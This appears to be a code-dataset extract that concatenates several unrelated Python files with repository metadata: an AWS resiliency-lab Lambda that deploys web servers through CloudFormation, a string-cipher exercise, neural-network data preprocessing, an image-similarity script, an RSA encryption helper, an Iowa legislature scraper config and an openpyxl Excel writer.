help='Specify the device id or label to which we will send the command.')
command_parser.set_defaults(func=send_command)
args = parser.parse_args()
logging.basicConfig(
level=loglevels[args.loglevel],
format='%(levelname)s:\t%(name)s\t%(message)s')
sys.exit(args.func(args))
if __name__ == '__main__':
main()
| 29.442149 | 107 | 0.663719 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,051 | 0.28786 |
7b15f666dd8b6c5e2030f1efa5c2aa16458ac78c
| 14,567 |
py
|
Python
|
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
#
# MIT No Attribution
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import print_function
from botocore.exceptions import ClientError
import os
import sys
import logging
import traceback
import boto3
import json
LOG_LEVELS = {'CRITICAL': 50, 'ERROR': 40, 'WARNING': 30, 'INFO': 20, 'DEBUG': 10}
stackname = 'WebServersForResiliencyTesting'
AWS_REGION = 'us-east-2'
ARCH_TO_AMI_NAME_PATTERN = {
# Architecture: (pattern, owner)
"PV64": ("amzn2-ami-pv*.x86_64-ebs", "amazon"),
"HVM64": ("amzn2-ami-hvm-*-x86_64-gp2", "amazon"),
"HVMG2": ("amzn2-ami-graphics-hvm-*x86_64-ebs*", "679593333241")
}
def init_logging():
# Setup loggin because debugging with print can get ugly.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logging.getLogger("boto3").setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('nose').setLevel(logging.WARNING)
return logger
def setup_local_logging(logger, log_level='INFO'):
# Set the Logger so if running locally, it will print out to the main screen.
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def set_log_level(logger, log_level='INFO'):
# There is some stuff that needs to go here.
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def process_global_vars():
logger.info("Processing variables from environment.")
try:
global stackname
stackname = 'WebServersForResiliencyTesting'
except SystemExit:
sys.exit(1)
except Exception:
logger.error("Unexpected error!\n Stack Trace:", traceback.format_exc())
def find_latest_ami_name(region, arch):
assert region, "Region is not defined"
assert arch, "Architecture is not defined"
assert arch in ARCH_TO_AMI_NAME_PATTERN, \
"Architecture must be one of {}".format(
ARCH_TO_AMI_NAME_PATTERN.keys())
pattern, owner = ARCH_TO_AMI_NAME_PATTERN[arch]
ec2 = boto3.client("ec2", region_name=region)
images = ec2.describe_images(
Filters=[dict(
Name="name",
Values=[pattern]
)],
Owners=[owner]
).get("Images", [])
assert images, "No images were found"
sorted_images = sorted(
images,
key=lambda image: image["CreationDate"],
reverse=True
)
latest_image = sorted_images[0]
return latest_image["ImageId"]
def find_in_outputs(outputs, key_to_find):
output_string = None
for output in outputs:
if (output['OutputKey'] == key_to_find):
output_string = output['OutputValue']
break
return output_string
def get_password_from_ssm(parameter_name, region):
client = boto3.client('ssm', region_name=region)
logger.debug("Getting pwd from SSM parameter store.")
value = client.get_parameter(
Name=parameter_name,
WithDecryption=True
)
return value['Parameter']['Value']
def deploy_web_servers(event):
logger.debug("Running function deploy_web_servers")
try:
region = event['region_name']
cfn_region = event['cfn_region']
bucket = event['cfn_bucket']
key_prefix = event['folder']
except Exception:
region = os.environ.get('AWS_REGION', AWS_REGION)
cfn_region = os.environ.get('AWS_REGION', AWS_REGION)
bucket = "arc327-well-architected-for-reliability",
key_prefix = "/"
# Create CloudFormation client
client = boto3.client('cloudformation', region)
# Get the S3 bucket the boot script is in, and the object to retrieve and the image to display
boot_bucket = event['boot_bucket']
boot_prefix = event['boot_prefix']
if 'boot_object' in event:
boot_object = event['boot_object']
else:
boot_object = None
websiteimage = event['websiteimage']
# Get the outputs of the VPC stack
vpc_stack = event['vpc']['stackname']
try:
stack_response = client.describe_stacks(StackName=vpc_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
vpc_outputs = stack_list[0]['Outputs']
try:
workshop_name = event['workshop']
except Exception:
logger.debug("Unexpected error!\n Stack Trace:", traceback.format_exc())
workshop_name = 'UnknownWorkshop'
# Create the list of subnets to pass
igw_subnets = find_in_outputs(vpc_outputs, 'IGWSubnets')
private_subnets = find_in_outputs(vpc_outputs, 'PrivateSubnets')
# Get the VPC
vpcid = find_in_outputs(vpc_outputs, 'VPC')
# Get the list of security groups to pass
elb_sg = find_in_outputs(vpc_outputs, 'WebELBSecurityGroup')
web_sg = find_in_outputs(vpc_outputs, 'WebSecurityGroup')
bastion_sg = find_in_outputs(vpc_outputs, 'BastionSecurityGroup')
webserver_sg_list = web_sg + ',' + bastion_sg
# Run in zones a, b, and c
azs = region + "a," + region + "b," + region + "c"
# Get the latest AMI
latest_ami = find_latest_ami_name(region, "HVM64")
# Get the outputs of the RDS stack
rds_stack = event['rds']['stackname']
try:
stack_response = client.describe_stacks(StackName=rds_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
try:
workshop_name = event['workshop']
except Exception:
workshop_name = 'UnknownWorkshop'
rds_outputs = stack_list[0]['Outputs']
# Get the hostname of the RDS host
rds_host = find_in_outputs(rds_outputs, 'DBAddress')
rds_password = get_password_from_ssm(workshop_name, region)
# Prepare the stack parameters
webserver_parameters = []
webserver_parameters.append({'ParameterKey': 'VPCID', 'ParameterValue': vpcid, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSecurityGroups', 'ParameterValue': webserver_sg_list, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSG', 'ParameterValue': elb_sg, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSubnets', 'ParameterValue': igw_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSubnets', 'ParameterValue': private_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerInstanceType', 'ParameterValue': 't2.micro', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerAMI', 'ParameterValue': latest_ami, 'UsePreviousValue': False})
webserver_parameters.append({'ParameterKey': 'AvailabilityZones', 'ParameterValue': azs, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucketRegion', 'ParameterValue': cfn_region, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucket', 'ParameterValue': boot_bucket, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootPrefix', 'ParameterValue': boot_prefix, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebSiteImage', 'ParameterValue': websiteimage, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSHostName', 'ParameterValue': rds_host, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSUser', 'ParameterValue': 'admin', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSPassword', 'ParameterValue': rds_password, 'UsePreviousValue': False})
# If Boot Object is supplied then use it, otherwise CloudFormation template will use Parameter default
if boot_object is not None:
webserver_parameters.append({'ParameterKey': 'BootObject', 'ParameterValue': boot_object, 'UsePreviousValue': True})
stack_tags = []
stack_tags.append({'Key': 'Workshop', 'Value': 'AWSWellArchitectedReliability' + workshop_name})
capabilities = []
capabilities.append('CAPABILITY_NAMED_IAM')
web_template_s3_url = "https://s3." + cfn_region + ".amazonaws.com/" + bucket + "/" + key_prefix + "web_server_autoscaling.json"
client.create_stack(
StackName=stackname,
TemplateURL=web_template_s3_url,
Parameters=webserver_parameters,
DisableRollback=False,
TimeoutInMinutes=10,
Capabilities=capabilities,
Tags=stack_tags
)
return_dict = {'stackname': stackname}
return return_dict
def check_stack(region, stack_name):
# Create CloudFormation client
logger.debug("Running function check_stack in region " + region)
logger.debug("Running function check_stack on stack " + stack_name)
client = boto3.client('cloudformation', region)
# See if you can retrieve the stack
try:
stack_response = client.describe_stacks(StackName=stack_name)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("No Stack named " + stack_name)
return False
logger.debug("Found stack named " + stack_name)
logger.debug("Status: " + stack_list[0]['StackStatus'])
return True
except ClientError as e:
# If the exception is that it doesn't exist, then check the client error before returning a value
if (e.response['Error']['Code'] == 'ValidationError'):
return False
else:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
logger.debug("Client error:" + str(e.response))
return True
except Exception:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
print("Stack Trace:", traceback.format_exc())
return True
def status_complete(status):
return status == 'UPDATE_COMPLETE' or status == 'CREATE_COMPLETE' or status == 'UPDATE_ROLLBACK_COMPLETE'
def lambda_handler(event, context):
try:
global logger
logger = init_logging()
logger = set_log_level(logger, os.environ.get('log_level', event['log_level']))
logger.debug("Running function lambda_handler")
logger.info('event:')
logger.info(json.dumps(event))
if (context != 0):
logger.info('context.log_stream_name:' + context.log_stream_name)
logger.info('context.log_group_name:' + context.log_group_name)
logger.info('context.aws_request_id:' + context.aws_request_id)
else:
logger.info("No Context Object!")
process_global_vars()
# Check to see if the previous stack was actually created
vpc_stack_status = event['vpc']['status']
if (status_complete(vpc_stack_status)):
rds_stack_status = event['rds']['status']
if (status_complete(rds_stack_status)):
if not check_stack(event['region_name'], stackname):
logger.debug("Stack " + stackname + " doesn't exist; creating")
return deploy_web_servers(event)
else:
logger.debug("Stack " + stackname + " exists")
return_dict = {'stackname': stackname}
return return_dict
else:
logger.debug("RDS Stack was not completely created: status = " + rds_stack_status)
sys.exit(1)
else:
logger.debug("VPC Stack was not completely created: status = " + vpc_stack_status)
sys.exit(1)
except SystemExit:
logger.error("Exiting")
sys.exit(1)
except ValueError:
exit(1)
except Exception:
print("Unexpected error!\n Stack Trace:", traceback.format_exc())
exit(0)
if __name__ == "__main__":
logger = init_logging()
event = {
'vpc': {
'stackname': 'ResiliencyVPC',
'status': 'CREATE_COMPLETE'
},
'rds': {
'stackname': 'MySQLforResiliencyTesting',
'status': 'CREATE_COMPLETE'
},
'log_level': 'DEBUG',
'region_name': 'ap-northeast-2',
'cfn_region': 'us-east-2',
'cfn_bucket': 'aws-well-architected-labs-ohio',
'folder': 'Reliability/',
'boot_bucket': 'aws-well-architected-labs-ohio',
'boot_prefix': 'Reliability/',
'boot_object': 'bootstrapARC327.sh',
'websiteimage': 'https://s3.us-east-2.amazonaws.com/arc327-well-architected-for-reliability/Cirque_of_the_Towers.jpg',
'workshop': 'LondonSummit'
}
os.environ['log_level'] = os.environ.get('log_level', event['log_level'])
logger = setup_local_logging(logger, os.environ['log_level'])
# Add default level of debug for local execution
lambda_handler(event, 0)
| 39.800546 | 139 | 0.674126 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,878 | 0.403515 |
7b16d187420b13711f7fff210fdd319f14807224
| 483 |
py
|
Python
|
URI/1024.py
|
leilaapsilva/BabySteps
|
32b1e6439fa3be49c93a3cae0b4fbd0f03a713be
|
[
"MIT"
] | 37 |
2020-10-01T03:50:42.000Z
|
2021-11-23T00:49:51.000Z
|
URI/1024.py
|
leilaapsilva/BabySteps
|
32b1e6439fa3be49c93a3cae0b4fbd0f03a713be
|
[
"MIT"
] | 27 |
2020-10-03T23:16:13.000Z
|
2021-11-19T19:53:01.000Z
|
URI/1024.py
|
leilaapsilva/BabySteps
|
32b1e6439fa3be49c93a3cae0b4fbd0f03a713be
|
[
"MIT"
] | 97 |
2020-10-01T11:39:01.000Z
|
2021-11-01T00:30:53.000Z
|
alpha = "abcdefghijklmnopqrstuvwxyz"
n = int(raw_input())
for i in xrange(n):
word = raw_input()
aux_word = ""
first_part = ""
second_part = ""
for j in xrange(len(word)-1, -1, -1):
if(word[j].lower() in alpha):
aux_word += chr(ord(word[j]) + 3)
else:
aux_word += word[j]
middle = (len(word)/2)
first_part = aux_word[0:middle]
for k in xrange((len(aux_word)/2), len(aux_word)):
second_part += chr(ord(aux_word[k]) -1)
print first_part + second_part
| 21 | 51 | 0.6294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.070393 |
7b17163e98fca69e6d9d2a2ecd44f5b5e78cfd5c
| 6,095 |
py
|
Python
|
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | 1 |
2019-08-20T11:17:56.000Z
|
2019-08-20T11:17:56.000Z
|
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | null | null | null |
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | null | null | null |
import numpy as np
# For file manipulation and locating
import os
# For the progress bar
from tqdm import tqdm
# To create a deep copy of the data
import copy
# To load the pre-processed and split data
from pre_process import load_data as ld
# For normalization of the samples
from sklearn.preprocessing import normalize
# We define some constant that we reuse
PROCESSED_DIR = "data/processed/"
def save_data(data, file_path, name):
"""
Saves the data
given the name and
the file path
Parameters
----------
data: numpy matrix
Data matrix with features
file_path: str
File path where the file should be saved
name: str
Specific name of the given file
"""
np.save(file_path + "{}.npy".format(name),data)
def preprocess(X, Y, size = 100000,lower_bound=0, upper_bound = 7368,samples = 10, same_class=0.4, different = 0.5, penalty = 10, same_class_penalty=1):
"""
Preprocessed the dataset
It creates two lists X,Y
It randomly chooses a sample from the input list
and then that sample is repeated in total * samples time
For each repeated sample it finds a portion of
images corresponding to different labels,
images corresponding to the same class and
a certain portion of identities
based on the class membership a penalty is applied or not
Parameters
----------
X: numpy array of features
Numpy array of features from which the pairs are created
Y: numpy array
Numpy array of corresponding labels
Returns
-------
X_selected: numpy array
Numpy array of the first input in the pairs
Y_selected: numpy array
Numpy array of the second input in the pairs
values: numpy array
Artificially determined distances
"""
X = normalize(X, axis=1)
N,F = X.shape
X_selected = []
Y_selected = []
values = []
C = int(samples*same_class)
D = int(samples*different)
selected_i = []
for i in tqdm(range(int(size/samples))):
# Randomly select a sample but do not repeat it with respect ot previous samples
random_i = np.random.randint(lower_bound,upper_bound)
while random_i in selected_i:
random_i = np.random.randint(lower_bound,upper_bound)
selected_i.append(random_i)
C_counter = 0
D_counter = 0
offset = 0
# Add samples which correspond to different label than the original image
selected_j = []
while D_counter<D:
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] != Y[random_j]:
D_counter+=1
offset+=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(penalty)
selected_j.append(random_j)
# Add samples which correspond to the same class
selected_j = []
while C_counter<C:
low = 0
high = N
if random_i-10>lower_bound:
low = random_i-10
if random_i+10<upper_bound:
high = random_i+10
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] == Y[random_j] and random_i!=random_j:
C_counter+=1
offset +=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(same_class_penalty)
selected_j.append(random_j)
# Fill in the rest with identities
while offset < samples:
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_i]))
offset+=1
values.append(0)
indeces = np.random.choice(size, size=size, replace=False)
X_selected = np.array(X_selected)
Y_selected = np.array(Y_selected)
values = np.array(values)
return [X_selected[indeces], Y_selected[indeces], values[indeces]]
def load_data(retrain=False):
"""
Load the cached data or call preprocess()
to generate new data
Parameters
----------
None
Returns
-------
all_data: list
* All the data split into lists of [features, labels]
"""
all_data = ld(False)
training_data = all_data[0]
Y = training_data[1]
X = training_data[0]
if retrain is True:
print("Generating new data...")
X_train, Y_train, values_train = preprocess(X,Y, 40000, 0, 6379,samples = 10, same_class=0.4, different = 0.5, penalty = 1,same_class_penalty=0)
X_validation, Y_validation, values_validation = preprocess(X,Y, 7500, 6380,samples = 10, same_class=0.2, different = 0.7, penalty = 1, same_class_penalty=0)
save_data(X_train,PROCESSED_DIR,"training_nn_X")
save_data(Y_train,PROCESSED_DIR,"training_nn_Y")
save_data(values_train,PROCESSED_DIR,"training_nn_values")
save_data(X_validation,PROCESSED_DIR,"validation_nn_X")
save_data(Y_validation,PROCESSED_DIR,"validation_nn_Y")
save_data(values_validation,PROCESSED_DIR,"validation_nn_values")
return [X_train, Y_train, values_train, X_validation, Y_validation, values_validation]
else:
print("Loading data...")
data = []
data.append(np.load(PROCESSED_DIR + "training_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_values.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_values.npy"))
return data
if __name__ == '__main__':
load_data(retrain=True)
| 33.674033 | 164 | 0.642986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,136 | 0.350451 |
7b180f7965af3a7127ae86b77bf7384badafe436
| 776 |
py
|
Python
|
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | null | null | null |
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | 1 |
2021-06-08T21:41:19.000Z
|
2021-06-08T21:41:19.000Z
|
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | null | null | null |
import pandas as pd
import time
from image_matcher import read_image, bjorn_score
def main(data_location='../data/', data_file='input.csv'):
df = pd.read_csv(data_location + data_file)
score_list, runtime_list = [], []
for idx, row in df.iterrows():
image1_file, image2_file = data_location + \
row.image1, data_location + row.image2
image1 = read_image(image1_file)
image2 = read_image(image2_file)
start = time.time()
score = bjorn_score(image1, image2)
end = time.time()
score_list.append(score)
runtime_list.append(f"{end-start:9f}")
df['similar'] = score_list
df['elapsed'] = runtime_list
df.to_csv('output.csv', index=False)
if __name__ == "__main__":
main()
| 26.758621 | 58 | 0.643041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.100515 |
7b1892266415333934744e874665f21d627beb7f
| 2,006 |
py
|
Python
|
build/lib.linux-x86_64-2.7/biograder/Encryptor.py
|
PayneLab/GenericDataAPI
|
9469328c4f845fbf8d97b5d80ad2077c9f927022
|
[
"MIT"
] | 2 |
2021-04-25T18:36:29.000Z
|
2021-05-14T15:34:59.000Z
|
build/lib.linux-x86_64-2.7/biograder/Encryptor.py
|
PayneLab/GenericDataAPI
|
9469328c4f845fbf8d97b5d80ad2077c9f927022
|
[
"MIT"
] | null | null | null |
build/lib.linux-x86_64-2.7/biograder/Encryptor.py
|
PayneLab/GenericDataAPI
|
9469328c4f845fbf8d97b5d80ad2077c9f927022
|
[
"MIT"
] | 2 |
2020-11-23T02:09:57.000Z
|
2021-08-13T21:57:03.000Z
|
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import serialization
class Encryptor:
def __init__(self):
#Todo: read key from file
self.public_key = self.getKey()
pass
def getKey(self):
with open("public_key.pem", "rb") as key_file:
public_key = serialization.load_pem_public_key(
key_file.read(),
backend=default_backend()
)
return public_key
def uploadToBox(self, raw_file):
#need to parse out answers and encrypt them
#create new file and push the encrypted answers (and hints to separate file unencrypted)
pass
def encrypt(self, raw_data):
print(raw_data)
#below posed as a possible alternative
#pow(message, public.e, public.n)
encrypted = self.public_key.encrypt(
raw_data,
padding.OAEP(
#mgf=padding.MGF1(algorithm=hashes.SHA256()),
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
return encrypted
#only called once ever! don't want more than one set of keys
def saveKey(self, public_key, private_key):
pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
with open('public_key.pem', 'wb') as f:
f.write(pem)
pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
with open('private_key.pem', 'wb') as f:
f.write(pem)
| 31.84127 | 97 | 0.602193 | 1,766 | 0.880359 | 0 | 0 | 0 | 0 | 0 | 0 | 400 | 0.199402 |
7b190c0f4573cd290b14012b9fc7b11615f31516
| 218 |
py
|
Python
|
elif_bayindir/phase_1/python_basic_1/day_6/q7.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 6 |
2020-05-23T19:53:25.000Z
|
2021-05-08T20:21:30.000Z
|
elif_bayindir/phase_1/python_basic_1/day_6/q7.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 8 |
2020-05-14T18:53:12.000Z
|
2020-07-03T00:06:20.000Z
|
elif_bayindir/phase_1/python_basic_1/day_6/q7.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 39 |
2020-05-10T20:55:02.000Z
|
2020-09-12T17:40:59.000Z
|
# Question 7
# Find out the number of CPUs using
import os
print("Number of CPUs using:", os.cpu_count())
# Alternative,
""" import multiprocessing
print("Number of CPUs using:", multiprocessing.cpu_count()) """
| 18.166667 | 63 | 0.711009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.802752 |
7b1bfc88d4da28ede06e1a7e0dc3ba09c6ec9cb9
| 3,081 |
py
|
Python
|
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
openstates/openstates-master/openstates/ia/__init__.py
|
Jgorsick/Advocacy_Angular
|
8906af3ba729b2303880f319d52bce0d6595764c
|
[
"CC-BY-4.0"
] | null | null | null |
import re
import datetime
import lxml.html
import requests
from billy.utils.fulltext import text_after_line_numbers
from .bills import IABillScraper
from .legislators import IALegislatorScraper
from .events import IAEventScraper
from .votes import IAVoteScraper
# Silencing unverified HTTPS request warnings.
requests.packages.urllib3.disable_warnings()
settings = dict(SCRAPELIB_TIMEOUT=240)
metadata = dict(
name = 'Iowa',
abbreviation = 'ia',
capitol_timezone = 'America/Chicago',
legislature_name = 'Iowa General Assembly',
legislature_url = 'https://www.legis.iowa.gov/',
chambers = {
'upper': {'name': 'Senate', 'title': 'Senator'},
'lower': {'name': 'House', 'title': 'Representative'},
},
terms = [
{
'name': '2011-2012',
'start_year': 2011,
'end_year': 2012,
'sessions': ['2011-2012'],
},
{
'name': '2013-2014',
'start_year': 2013,
'end_year': 2014,
'sessions': ['2013-2014'],
},
{
'name': '2015-2016',
'start_year': 2015,
'end_year': 2016,
'sessions': ['2015-2016'],
},
],
session_details = {
'2011-2012': {
'display_name': '2011-2012 Regular Session',
'_scraped_name': 'General Assembly: 84',
'number': '84',
'start_date': datetime.date(2011, 1, 10),
'end_date': datetime.date(2013, 1, 13),
},
'2013-2014': {
'display_name': '2013-2014 Regular Session',
'_scraped_name': 'General Assembly: 85',
'number': '85',
},
'2015-2016': {
'display_name': '2015-2016 Regular Session',
'_scraped_name': 'General Assembly: 86',
'number': '86',
},
},
feature_flags = ['events', 'influenceexplorer'],
_ignored_scraped_sessions = [
'Legislative Assembly: 86',
'General Assembly: 83',
'General Assembly: 82',
'General Assembly: 81',
'General Assembly: 80',
'General Assembly: 79',
'General Assembly: 79',
'General Assembly: 78',
'General Assembly: 78',
'General Assembly: 77',
'General Assembly: 77',
'General Assembly: 76',
]
)
def session_list():
def url_xpath(url, path):
doc = lxml.html.fromstring(requests.get(url, verify=False).text)
return doc.xpath(path)
sessions = url_xpath(
'https://www.legis.iowa.gov/legislation/findLegislation',
"//section[@class='grid_6']//li/a/text()[normalize-space()]"
)
sessions = [x[0] for x in filter(lambda x: x != [], [
re.findall(r'^.*Assembly: [0-9]+', session)
for session in sessions
])]
return sessions
def extract_text(doc, data):
doc = lxml.html.fromstring(data)
text = doc.xpath('//pre')[0].text_content()
# strip two sets of line numbers
return text_after_line_numbers(text_after_line_numbers(text))
| 29.066038 | 72 | 0.563778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,182 | 0.383642 |
7b1e18b2a4656893e78e78b318983823f4f03309
| 2,965 |
py
|
Python
|
dp_excel/ExcelFile.py
|
DmitryPaschenko/python_excel_writer
|
d23acbe44e3e7e786fd8fd8deb1f47263326199f
|
[
"MIT"
] | null | null | null |
dp_excel/ExcelFile.py
|
DmitryPaschenko/python_excel_writer
|
d23acbe44e3e7e786fd8fd8deb1f47263326199f
|
[
"MIT"
] | null | null | null |
dp_excel/ExcelFile.py
|
DmitryPaschenko/python_excel_writer
|
d23acbe44e3e7e786fd8fd8deb1f47263326199f
|
[
"MIT"
] | null | null | null |
from openpyxl import Workbook
from openpyxl.utils import get_column_letter
from openpyxl.writer.excel import save_virtual_workbook
class ExcelFile:
def __init__(self, file_name):
self.file_name = file_name
self.workbook = Workbook()
self.active_worksheet = self.workbook.active
self.current_position = {'col': 1, 'row': 1}
@staticmethod
def get_idx(column_number, row_number):
return '{column}{row}'.format(column=get_column_letter(column_number), row=row_number)
def add_worksheet(self, title=None, index=None, set_is_active=True):
worksheet = self.workbook.create_sheet(title=title, index=index)
if set_is_active:
self.set_active_worksheet(worksheet)
def get_worksheet_by_title(self, title):
for sheet in self.workbook:
if sheet.title == title:
return sheet
raise ValueError('Worksheet with title {0} Not Found'.format(title))
def set_active_worksheet(self, worksheet):
self.active_worksheet = worksheet
def set_active_worksheet_by_title(self, title):
self.active_worksheet = self.get_worksheet_by_title(title=title)
def set_position(self, column_number, row_number):
"""
Set active excel cell
:param column_number: integer
:param row_number: integer
:return:
"""
self.current_position = {'col': column_number, 'row': row_number}
return self
def render_row_by_template(self, template):
"""
Render row by template
:param template: ExcelRowTemplate object
:return:
"""
start_col_idx = self.current_position['col']
for row in template.get_rows():
self.current_position['col'] = start_col_idx
template.get_row_options(row).apply_row_options(self.active_worksheet, self.current_position['row'])
for cell in template.get_columns(row):
if not cell.is_empty:
col_idx = get_column_letter(self.current_position['col'])
row_idx = self.current_position['row']
cell_idx = '{column}{row}'.format(column=col_idx, row=row_idx)
self.active_worksheet[cell_idx] = cell.value
cell.options.apply_cell_options(self.active_worksheet, self.current_position['col'], row_idx)
self.current_position['col'] += 1
self.current_position['row'] += 1
self.current_position['col'] = start_col_idx
def save(self, path=None):
self.workbook.save('{0}{1}.xlsx'.format(path if path else '', self.file_name))
def get_virtual_workbook(self):
"""
EXAMPLE USING return HttpResponse(excel_file.get_virtual_workbook(), content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
:return:
"""
return save_virtual_workbook(self.workbook)
| 36.158537 | 158 | 0.651602 | 2,831 | 0.954806 | 0 | 0 | 152 | 0.051265 | 0 | 0 | 588 | 0.198314 |
7b1ea6dc53dbed446cf8e4fe80ef8e9dd14dbdfd
| 435 |
py
|
Python
|
test/test_flow.py
|
williford/vipy
|
